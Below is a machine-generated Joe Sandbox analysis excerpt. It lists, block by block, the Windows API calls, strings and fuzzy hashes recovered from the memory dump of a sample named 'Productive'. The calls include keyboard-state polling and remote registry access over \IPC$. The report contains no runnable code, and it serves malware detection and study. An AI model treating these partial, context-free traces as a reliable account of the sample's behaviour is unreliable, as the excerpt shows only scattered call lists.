                                                                                                                                                                • Opcode Fuzzy Hash: a36a1d6735dc2ab49396fba07d32b1e5f07c358def1afaae9a3950e654872375
                                                                                                                                                                • Instruction Fuzzy Hash: 2B112630A50128F8D715A761CC4AEFFBB3CEBE6B40F900529B400D20D1EF601DA0CDA1
                                                                                                                                                                APIs
                                                                                                                                                                • timeGetTime.WINMM ref: 00315535
                                                                                                                                                                  • Part of subcall function 002D083E: timeGetTime.WINMM(?,00000002,002BC22C), ref: 002D0842
                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00315561
                                                                                                                                                                • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00315585
                                                                                                                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003155A7
                                                                                                                                                                • SetActiveWindow.USER32 ref: 003155C6
                                                                                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003155D4
                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 003155F3
                                                                                                                                                                • Sleep.KERNEL32(000000FA), ref: 003155FE
                                                                                                                                                                • IsWindow.USER32 ref: 0031560A
                                                                                                                                                                • EndDialog.USER32(00000000), ref: 0031561B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                • String ID: BUTTON
                                                                                                                                                                • API String ID: 1194449130-3405671355
                                                                                                                                                                • Opcode ID: 547cc56f5b90ae408c56a45195b7d6e40df6aa3e2fdf2475732dd0c1a53d9574
                                                                                                                                                                • Instruction ID: 6062c417d6c42836fda22f6c0f56637007e56d2e66d01c8813befc9dd43e46b2
                                                                                                                                                                • Opcode Fuzzy Hash: 547cc56f5b90ae408c56a45195b7d6e40df6aa3e2fdf2475732dd0c1a53d9574
                                                                                                                                                                • Instruction Fuzzy Hash: 6D21D478248604EFE75B5B60EC8CA653B6EEB8F355F011018F50A85171EF756CD0DA62
                                                                                                                                                                APIs
                                                                                                                                                                • GetMenuItemCount.USER32(00377890), ref: 00300E7B
                                                                                                                                                                • GetMenuItemCount.USER32(00377890), ref: 00300F2B
                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00300F6F
                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00300F78
                                                                                                                                                                • TrackPopupMenuEx.USER32(00377890,00000000,?,00000000,00000000,00000000), ref: 00300F8B
                                                                                                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00300F97
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 36266755-0
                                                                                                                                                                • Opcode ID: 2e46d041644d76a3491ee5a6cfc2491a197dcf06f982ade17e78c79c2755ddbe
                                                                                                                                                                • Instruction ID: 69b3c38f04561519c9795c993eb1e6bc707d5046acdaaa883678f4df40703931
                                                                                                                                                                • Opcode Fuzzy Hash: 2e46d041644d76a3491ee5a6cfc2491a197dcf06f982ade17e78c79c2755ddbe
                                                                                                                                                                • Instruction Fuzzy Hash: 47712770615715BFEB2A8F54CC85FAABF68FF05324F100216F6246A1D0CBB1B8A0DB90
                                                                                                                                                                APIs
                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00310896
                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 00310901
                                                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00310921
                                                                                                                                                                • GetKeyState.USER32(000000A0), ref: 00310938
                                                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00310967
                                                                                                                                                                • GetKeyState.USER32(000000A1), ref: 00310978
                                                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 003109A4
                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 003109B2
                                                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 003109DB
                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 003109E9
                                                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00310A12
                                                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00310A20
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 541375521-0
                                                                                                                                                                • Opcode ID: ded1136d5b17183c52238f261089be886bf3653521352d46f042a7174cf6febf
                                                                                                                                                                • Instruction ID: 785ca387f459c3d6bac910008b1d50cc26af7192b2e0b20e3b71f12631b4b12f
                                                                                                                                                                • Opcode Fuzzy Hash: ded1136d5b17183c52238f261089be886bf3653521352d46f042a7174cf6febf
                                                                                                                                                                • Instruction Fuzzy Hash: D251CD24A0879819FB3EDBB044107EABFB49F05780F09859DD5C15B1C3DAE4AACCC791
                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 0030CE1C
                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0030CE2E
                                                                                                                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0030CE8C
                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 0030CE97
                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0030CEA9
                                                                                                                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0030CEFD
                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0030CF0B
                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0030CF1C
                                                                                                                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0030CF5F
                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0030CF6D
                                                                                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0030CF8A
                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0030CF97
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3096461208-0
                                                                                                                                                                • Opcode ID: 429d3fb19d344ca0704b997a83117582984a38ca67ddf77ee71468689b05c57c
                                                                                                                                                                • Instruction ID: 96e96b5d441bae5764dba63ce96699a6593007c459fdc37dbc699545850dd4a7
                                                                                                                                                                • Opcode Fuzzy Hash: 429d3fb19d344ca0704b997a83117582984a38ca67ddf77ee71468689b05c57c
                                                                                                                                                                • Instruction Fuzzy Hash: CE518575B10205AFDB19CF68CD95AADBBBAEB88311F15822DF616D72D0DB70AD00CB10
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002B29AB: GetWindowLongW.USER32(?,000000EB), ref: 002B29BC
                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 002B25AF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ColorLongWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 259745315-0
                                                                                                                                                                • Opcode ID: 4731cceeb6397c6cbb9c6bb45e0986e1f3368fa9271695586e27de2dc2963388
                                                                                                                                                                • Instruction ID: c89449780df2a1ef189622944a3193cb5c2fb13af652ea0f72ba821bc2e8902a
                                                                                                                                                                • Opcode Fuzzy Hash: 4731cceeb6397c6cbb9c6bb45e0986e1f3368fa9271695586e27de2dc2963388
                                                                                                                                                                • Instruction Fuzzy Hash: 4E41F334124240EFDB2A5F68DC88BF93769EB0A371F184265FE658E1E5CB309C56DB21
                                                                                                                                                                APIs
                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0030B17B
                                                                                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0030B284
                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0030B2F7
                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 0030B349
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0030B37F
                                                                                                                                                                • GetParent.USER32(?), ref: 0030B39D
                                                                                                                                                                • ScreenToClient.USER32(00000000), ref: 0030B3A4
                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0030B41E
                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0030B458
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                                                                                                • String ID: %s%u
                                                                                                                                                                • API String ID: 1412819556-679674701
                                                                                                                                                                • Opcode ID: 9167c10eaf194f2d0cd7aef46dd6fb4563745e0c39226577e2f4100b8d016bd7
                                                                                                                                                                • Instruction ID: 2e5f15373675262ecee44482c656b8ec20feb51dabd9bd89583e1721fb3cb691
                                                                                                                                                                • Opcode Fuzzy Hash: 9167c10eaf194f2d0cd7aef46dd6fb4563745e0c39226577e2f4100b8d016bd7
                                                                                                                                                                • Instruction Fuzzy Hash: 1EA1FF71205206AFD71ADF20C8A5FEAF7E8FF44350F108629F999C2191DB30EA55CBA1
                                                                                                                                                                APIs
                                                                                                                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 0030BAB1
                                                                                                                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 0030BAEA
                                                                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 0030BB07
                                                                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0030BB6E
                                                                                                                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 0030BBA5
                                                                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0030BBEE
                                                                                                                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 0030BC26
                                                                                                                                                                • GetWindowRect.USER32(00000004,?), ref: 0030BC8F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper
                                                                                                                                                                • String ID: @$ThumbnailClass
                                                                                                                                                                • API String ID: 3725905772-1539354611
                                                                                                                                                                • Opcode ID: 2d41b3f73a32eaa2899ab180ebf888bcc1486881e1fb2a1dcbf4f11674b3aa2e
                                                                                                                                                                • Instruction ID: 530088d0e342b620e3c2eabdfa4ac3cc4e4ed933a858f6c97a151825c7b6ab57
                                                                                                                                                                • Opcode Fuzzy Hash: 2d41b3f73a32eaa2899ab180ebf888bcc1486881e1fb2a1dcbf4f11674b3aa2e
                                                                                                                                                                • Instruction Fuzzy Hash: 7681CE710092059BEB06CF14C8A5FAABBECEF44314F04856AFD899A0D6DB34EE55CB61
                                                                                                                                                                APIs
                                                                                                                                                                • CharLowerBuffW.USER32(?,?,00340980), ref: 0031AF4E
                                                                                                                                                                • GetDriveTypeW.KERNEL32(00000061,0036B5F0,00000061), ref: 0031B018
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BuffCharDriveLowerType
                                                                                                                                                                • String ID: L,4$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                • API String ID: 2426244813-758789741
                                                                                                                                                                • Opcode ID: b22a4bc70d87e2dc9152c4033d91d5e6fcd20cab9ee319ba9d1dd03699c5462e
                                                                                                                                                                • Instruction ID: a8c4d0f381e6d116f8454cfa5a4efb66b6c3dc4743ed257204533cb771d72559
                                                                                                                                                                • Opcode Fuzzy Hash: b22a4bc70d87e2dc9152c4033d91d5e6fcd20cab9ee319ba9d1dd03699c5462e
                                                                                                                                                                • Instruction Fuzzy Hash: CF51D3701283059FC31AEF14CC91AEAB7A5EF99340F50481EF596572A2DB30ED9ACE53
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,002FF8B8,00000001,0000138C,00000001,00000001,00000001,?,00323FF9,00000001), ref: 0031009A
                                                                                                                                                                • LoadStringW.USER32(00000000,?,002FF8B8,00000001), ref: 003100A3
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00377310,?,00000FFF,?,?,002FF8B8,00000001,0000138C,00000001,00000001,00000001,?,00323FF9,00000001,00000001), ref: 003100C5
                                                                                                                                                                • LoadStringW.USER32(00000000,?,002FF8B8,00000001), ref: 003100C8
                                                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003101E9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleLoadModuleString$Message
                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                • API String ID: 4072794657-2268648507
                                                                                                                                                                • Opcode ID: 02a3555218bdd3aeaac103247fe24f26fde475b0681717a1f6024f0d52cc7270
                                                                                                                                                                • Instruction ID: a9edfb39e3abf58651200bada76bfe63a2cca198eaddae2c845132ed1e533aad
                                                                                                                                                                • Opcode Fuzzy Hash: 02a3555218bdd3aeaac103247fe24f26fde475b0681717a1f6024f0d52cc7270
                                                                                                                                                                • Instruction Fuzzy Hash: 93416172810119AACB19EBD0CD47EEEB77CAF19340F500229F505B6092DA756F69CFA1
                                                                                                                                                                APIs
                                                                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003084BE
                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003084DA
                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003084F6
                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00308520
                                                                                                                                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00308548
                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00308553
                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00308558
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                • API String ID: 3030280669-22481851
                                                                                                                                                                • Opcode ID: 9a852fef5c8843be8d9f6c4bde3b6b722f9d6a02c9d5d521420c545f4b408089
                                                                                                                                                                • Instruction ID: 8258d83d3c0218eca1d83cda9598b769c8db64a8098ed9e9980ecb950f8600df
                                                                                                                                                                • Opcode Fuzzy Hash: 9a852fef5c8843be8d9f6c4bde3b6b722f9d6a02c9d5d521420c545f4b408089
                                                                                                                                                                • Instruction Fuzzy Hash: D9410C76D2112DABCF16EBA4DC56EEDB778FF05340F004229E945A6151DA309E24CF90
                                                                                                                                                                APIs
                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0031A852
                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0031A8B1
                                                                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0031A8D6
                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0031A966
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0031A971
                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0031A97A
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0031A984
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                                                                                                                • String ID: :$\$\??\%s
                                                                                                                                                                • API String ID: 3827137101-3457252023
                                                                                                                                                                • Opcode ID: c9e4ef7ce91848ccf4fbe51b58d53c376566feacaae1a51179dc5880301513be
                                                                                                                                                                • Instruction ID: ee51fd6e7e5b7b11874969e2a45daec4875865437b8fc26fae83dba274095d49
                                                                                                                                                                • Opcode Fuzzy Hash: c9e4ef7ce91848ccf4fbe51b58d53c376566feacaae1a51179dc5880301513be
                                                                                                                                                                • Instruction Fuzzy Hash: 6F31B275510109ABDB229FA0DC49FEB77BCEF89701F1141A6FA08D6160EB7096948B25
                                                                                                                                                                APIs
                                                                                                                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00337B83
                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00337B8A
                                                                                                                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00337B9D
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00337BA5
                                                                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00337BB0
                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00337BB9
                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00337BC3
                                                                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00337BD7
                                                                                                                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00337BE3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                • String ID: static
                                                                                                                                                                • API String ID: 2559357485-2160076837
                                                                                                                                                                • Opcode ID: ada0d1158ce4f5e48dff6248544a09608182e42fdc29c60a18f3430e97c563b3
                                                                                                                                                                • Instruction ID: 44c0525f44f8c205fe2036d15304f30a359254830e00c47d711f1b217342509f
                                                                                                                                                                • Opcode Fuzzy Hash: ada0d1158ce4f5e48dff6248544a09608182e42fdc29c60a18f3430e97c563b3
                                                                                                                                                                • Instruction Fuzzy Hash: BF318175204214ABDF265F64DC89FDB7B6DFF0A360F110214FA55AA1A0CB35E860DBA0
                                                                                                                                                                APIs
                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 0031DC2D
                                                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0031DCC0
                                                                                                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 0031DCD4
                                                                                                                                                                • CoCreateInstance.OLE32(00343D4C,00000000,00000001,0036B86C,?), ref: 0031DD20
                                                                                                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0031DD8F
                                                                                                                                                                • CoTaskMemFree.OLE32(?,?), ref: 0031DDE7
